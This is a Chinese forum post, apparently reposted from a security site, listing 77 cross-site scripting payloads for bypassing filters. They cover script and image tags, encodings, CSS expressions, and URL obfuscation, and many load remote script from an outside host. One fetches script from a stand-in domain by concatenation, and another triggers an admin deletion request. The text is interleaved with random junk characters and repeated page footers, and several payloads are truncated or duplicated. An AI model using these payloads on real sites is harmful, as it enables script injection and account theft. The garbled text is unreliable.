貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
5 e( `# x2 e3 h% l/ f- M3 t. @ p4 V- q(1)普通的XSS JavaScript注入
5 {. D* C$ k( J* J H# A! u<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, R- l7 p. X) H$ E
(2)IMG标签XSS使用JavaScript命令9 \- g' o7 J2 n1 I: X* S- [4 ?
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 H, S- A4 |. n- v(3)IMG标签无分号无引号1 f" ^; ^1 q7 S9 O# u" O
<IMG SRC=javascript:alert(‘XSS’)>
( Q% O0 {* e- T# U) w" N# b(4)IMG标签大小写不敏感; B3 z' R9 t" T% `) b
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>6 H; s' R, J3 P1 w. N
(5)HTML编码(必须有分号)* p$ R+ b* V% w- h$ V
<IMG SRC=javascript:alert(“XSS”)>1 A. X: D \. q1 Y2 d" C) |: d
(6)修正缺陷IMG标签8 @( f- t: y) A( R, w: Z+ C
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
" `8 j* J# i$ S2 z, k
, T& P. C9 A, o7 u9 P3 I9 [# K5 ?4 E5 j( [7 ?3 t. w& t
(7)formCharCode标签(计算器)! E l4 y# Y( k2 f A9 \* N4 H2 r
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. d4 ~) [. k* n8 s(8)UTF-8的Unicode编码(计算器)
6 Z& Z0 i7 `$ y% y! t. A<IMG SRC=jav..省略..S')>! ]. i ~# e0 D2 |7 \' i8 @
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)) R5 V+ S* i: B3 d, q; [
<IMG SRC=jav..省略..S')>& _% E- z" P8 U" s- R& M. K; x
(10)十六进制编码也是没有分号(计算器)8 V: Y9 \: W! t; E0 W( r
<IMG SRC=java..省略..XSS')>
/ C8 s# p) H3 g* }(11)嵌入式标签,将Javascript分开
: U, E& y" i @3 C) n<IMG SRC=”jav ascript:alert(‘XSS’);”>; d+ c/ U5 Y o$ \
(12)嵌入式编码标签,将Javascript分开, a3 w5 N3 n. R$ A" F5 P
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( W. u3 C9 D8 C(13)嵌入式换行符( `+ `% G* H8 H2 h
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! c# X$ h, g$ S' k+ x& h' I(14)嵌入式回车5 e+ t3 W& [6 R5 q: V
<IMG SRC=”jav ascript:alert(‘XSS’);”># h W4 L$ N. m) |2 \* I
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
1 N0 ^/ `. c' g" z& c" K0 F<IMG SRC=”javascript:alert(‘XSS‘)”>
/ e V) l6 [2 b3 z(16)解决限制字符(要求同页面)
# k _1 r8 u+ K, i: H, J<script>z=’document.’</script>
/ g7 C% |, M- S/ D% p<script>z=z+’write(“‘</script>/ ~/ `, N/ i/ L" I/ X: O7 Z
<script>z=z+’<script’</script>
) `. ^. c8 j6 R<script>z=z+’ src=ht’</script>6 _4 i) C- k( I4 f9 `
<script>z=z+’tp://ww’</script>- z4 V5 m) h( r3 Y8 J, D/ K
<script>z=z+’w.shell’</script>. ]/ ~" j3 R/ { Z h: ~; F4 }+ j
<script>z=z+’.net/1.’</script>9 D& e8 I( C4 i% o" b
<script>z=z+’js></sc’</script>
1 U1 ^( |9 h b<script>z=z+’ript>”)’</script>
9 B! ]" `! w8 R% Z+ J- }<script>eval_r(z)</script>
+ q% u+ a5 d8 e9 y( y; h(17)空字符12-7-1 T00LS - Powered by Discuz! Board6 P8 H9 j& t& P
https://www.t00ls.net/viewthread ... table&tid=15267 2/6: W. M4 z8 H0 R: U
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out: x1 T+ c1 u% Q% e
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用, p) X; B# I! P0 N; z
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 o/ [5 q% d6 \3 z0 |# c8 U(19)Spaces和meta前的IMG标签
) ^ C( g6 z4 _<IMG SRC=” javascript:alert(‘XSS’);”>
# H2 C* z* S9 Q. `/ W/ Z(20)Non-alpha-non-digit XSS2 t1 @8 A: H# S
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 J' V6 x1 \6 W- ~, P/ M
(21)Non-alpha-non-digit XSS to 2# k$ w- N( j4 d/ _, ~1 B
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>% u1 U- g* t3 F. j
(22)Non-alpha-non-digit XSS to 3" a b) N# ]* L( X9 S
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
- X5 Z K. Z" ?. ~/ v' W(23)双开括号
$ Y4 Q1 g# z$ p8 i! s% c: Y, o& Z<<SCRIPT>alert(“XSS”);//<</SCRIPT>
/ I+ q; u5 c7 I6 E. A" r R& i(24)无结束脚本标记(仅火狐等浏览器)9 p3 g% A8 f: X& F$ f0 g% P. I. x
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>, ?$ l0 {) Y- c
(25)无结束脚本标记2
1 f8 u5 ~- ^! g<SCRIPT SRC=//3w.org/XSS/xss.js>
1 d& ]9 p9 V2 B- U(26)半开的HTML/JavaScript XSS
% v" `. v& z/ _8 ^# {7 \7 z7 v<IMG SRC=”javascript:alert(‘XSS’)”
5 v" {9 G- a, v" e t/ o2 b(27)双开角括号- ^3 m/ c/ `! U3 A
<iframe src=http://3w.org/XSS.html <
4 O' q9 [4 Z" ~9 v% ?(28)无单引号 双引号 分号
" k+ m8 U+ c4 |8 {. z y- J<SCRIPT>a=/XSS/: C7 [; _- K" m. C: f* u
alert(a.source)</SCRIPT>
% G5 }; M/ h8 ~2 Z(29)换码过滤的JavaScript
( j. `2 u9 W4 r\”;alert(‘XSS’);//9 a5 L" G% H( f9 E) f+ ~
(30)结束Title标签
K* F& L: U5 _) T' |+ {# H) }</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
8 k9 ?/ g ]+ `( }# ]- ]9 i6 l9 r0 [) c(31)Input Image
, e3 o) @4 |, p1 ?+ @, I( ^6 ^' g<INPUT SRC=”javascript:alert(‘XSS’);”>2 e+ s, I+ K. c2 j
(32)BODY Image
( R$ r/ T: o; F+ ]. N<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 g# t& d: T# f3 P+ {, t% ?- a( @(33)BODY标签8 @3 V m& @2 ^
<BODY(‘XSS’)>* Q, C; q3 o+ J) @# t
(34)IMG Dynsrc) i- e1 Z/ f) s& n! b9 W% ?& v
<IMG DYNSRC=”javascript:alert(‘XSS’)”>" t: C; @! R) f, I3 y$ c
(35)IMG Lowsrc
4 j% c( W: j3 N. { H( l<IMG LOWSRC=”javascript:alert(‘XSS’)”>
?( ^0 O* x4 p) \. h( `(36)BGSOUND
3 Z' n. h s6 P0 W6 z<BGSOUND SRC=”javascript:alert(‘XSS’);”>7 w9 l3 w5 |# d) \3 }, S |
(37)STYLE sheet
9 ]/ z/ ~0 P: X1 p<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
8 l" V" A. \' s% P$ F, B(38)远程样式表
) J9 e/ ]) x7 b" B! Y* r S, m) z<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>2 W8 S. f( v7 K% e$ u Q& X
(39)List-style-image(列表式)6 x8 |+ x- d7 w$ E9 g. U/ O
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- L/ B0 x4 `! E(40)IMG VBscript# F1 g) q% K g
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS$ U. I8 {" q% x3 t: W9 L
(41)META链接url3 ]# @7 k8 B+ t) R' r
4 R; Q; E- I+ X
q ]8 ~ E# @! Y! L( D
<META HTTP-EQUIV=”refresh” CONTENT=”0;
t9 [. |# U/ [3 j- UURL=http://;URL=javascript:alert(‘XSS’);”>
/ l) P, J) l# ?5 d$ b(42)Iframe0 ^: }% ?& l" B7 c( H5 s
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>9 y% n2 g1 D* V, F: x4 M
(43)Frame
\$ Q- x3 g e& a5 _0 p: X<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
8 Y5 D; E6 z' P: y3 Yhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6, [: n3 y+ S7 E# ?' p* Q5 ^
(44)Table1 |1 ]- x& R% e% x% u p/ c/ k
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
: P, Z$ _! |7 G4 R(45)TD* |( R6 }: n& P/ `, Q4 k q
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
& ~- Y5 s! }/ i& m( g, _( a7 o(46)DIV background-image' `+ w, H6 H& [1 C+ \
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>) T* }/ E, y4 [- d) s
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-4 S$ P V; }* B7 L
8&13&12288&65279), U n8 r* R) l& ~4 j; D
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ [) Y, m; N3 N* S7 e( v5 e
(48)DIV expression5 z. Q' {$ j0 M: O7 _, H
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>; L3 f: m( N% A; R& J& W+ j
(49)STYLE属性分拆表达; f+ }! a2 ~, S3 R7 l1 b
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>4 t/ ]/ S' y7 E8 [
(50)匿名STYLE(组成:开角号和一个字母开头)
' a9 s0 T) O" q<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>+ N- M1 G7 Q1 d4 I" c5 P
(51)STYLE background-image- j9 L/ u' n! m( B$ |/ m0 a+ E
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
/ q" `( v' f& HCLASS=XSS></A>. v) o. V2 \$ O/ T( Z( {9 H9 W* P
(52)IMG STYLE方式! |$ Q7 g8 o# g' S
exppression(alert(“XSS”))’>
8 j7 d3 D' z( C(53)STYLE background
- I. T( }% T( i, j. G7 O3 x<STYLE><STYLE
+ _6 q1 \& G+ q$ W; _! ntype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>" l8 E3 }+ a" U# L
(54)BASE4 Y- b. L1 V* y$ A6 n
<BASE HREF=”javascript:alert(‘XSS’);//”>
7 ^4 i, b9 [. h, q9 r8 S( m6 V! H2 L(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS" b8 H* B# }. O
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>1 g }# b( Y/ i
(56)在flash中使用ActionScrpt可以混进你XSS的代码
0 p. B }7 L) H' n& t; _a=”get”;
" ^/ C4 _5 Y) O4 ub=”URL(\”";
0 z" I7 X8 y4 h' J. ?& Bc=”javascript:”;4 S, x1 E+ S" u! @1 ?7 y5 \
d=”alert(‘XSS’);\”)”;
4 g4 @& N( i1 H2 v' Y; jeval_r(a+b+c+d);3 Z6 n$ T7 @6 y. p2 b8 C
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
! o; C3 B$ `% y* {' ?<HTML xmlns:xss>
8 T/ s& U! P2 y& h& v$ H1 F, [0 j<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
/ q0 |, O0 _8 a3 z<xss:xss>XSS</xss:xss>; z' A- [$ I; ~% I8 W
</HTML>
6 y1 X, P$ J2 a' w(58)如果过滤了你的JS你可以在图片里添加JS代码来利用% ?8 w% f. k0 y. {
<SCRIPT SRC=””></SCRIPT>
4 g* H* F* |0 G% Z% e }(59)IMG嵌入式命令,可执行任意命令1 A; l7 X) c9 B) v2 j3 E: e
<IMG SRC=”http://www.XXX.com/a.php?a=b”>4 \9 R1 Q: h( R( K' x" h" |
(60)IMG嵌入式命令(a.jpg在同服务器)
1 M2 S; b2 w; `$ h* Z$ sRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( g7 N5 v# }9 I0 r(61)绕符号过滤
, l8 m3 r0 r% x<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>: y2 C3 x2 e3 o5 h
(62)
9 H& Q7 H! ?6 C: w; |+ X6 l* t<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ _( r' \6 d1 `( F' f0 X
(63)
: m; D9 ?* ?3 r( R7 d$ K |6 f<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>. S1 G$ E4 m; B5 `; y0 `' o
(64)
9 z$ l5 w8 b$ p7 t<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
4 m9 ~/ ~/ u4 i! ^/ |(65)
: U; k& S. b/ _4 d4 T<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>" G1 ~0 h5 ~( {5 D
(66)12-7-1 T00LS - Powered by Discuz! Board
5 I z# L' u _7 d( Uhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
, s$ P, m' u/ ?6 `<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>6 B7 S! S) j- Z8 ?% s1 J' T
(67)
8 F& ?, k8 o `5 Z<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>8 g1 ]' |, d8 _2 z8 R
</SCRIPT>
% c, |. x, D1 n(68)URL绕行- ^0 i- l# X) D0 O D- ^9 |
<A HREF=”http://127.0.0.1/”>XSS</A>. ~+ f& a, ?" L3 q
(69)URL编码8 R7 q3 q( I# f
<A HREF=”http://3w.org”>XSS</A>4 e2 v! d6 n9 j4 l
(70)IP十进制
2 N! o. K* i& ~* \# T- |3 q* U<A HREF=”http://3232235521″>XSS</A>% Q: A2 t, o7 B4 F8 M' G( N
(71)IP十六进制0 R9 U$ }$ }: K5 w s
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>! W* C2 Z& u/ X* y! d0 O
(72)IP八进制
1 c3 j1 t6 B5 r1 e<A HREF=”http://0300.0250.0000.0001″>XSS</A>
7 {$ b: G2 ^4 x4 H5 c(73)混合编码- v# I* I+ I+ T5 z2 u. F8 h
<A HREF=”h7 V' Q8 Q0 r) V, F1 o
tt p://6 6.000146.0×7.147/”">XSS</A>
" u! k4 c% J" I4 t2 h" k! [+ Z# M/ E(74)节省[http:]
7 \" B8 G# F5 j5 C<A HREF=”//www.google.com/”>XSS</A>
" N, V! M" W# { x) O0 b(75)节省[www]( L& D9 _* G' G7 q" I, M0 a1 i) q! L
<A HREF=”http://google.com/”>XSS</A>, p! s) A1 N2 \4 W+ w m7 Y" Q
(76)绝对点绝对DNS
4 d! L2 P9 L/ \6 h9 M<A HREF=”http://www.google.com./”>XSS</A>, X( _; Z3 ?) x5 k% M$ v, W
(77)javascript链接
% ?# G& J! X3 o. q* u<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
4 p4 E9 ?$ a/ W! J# m s5 o
# `) |% T7 U0 }- ~原文地址:http://fuzzexp.org/u/0day/?p=14; B+ x* }6 i. d/ O
$ u8 e, d5 @% ]- K |
发表于 2013-4-19 19:22:37
收藏
支持
反对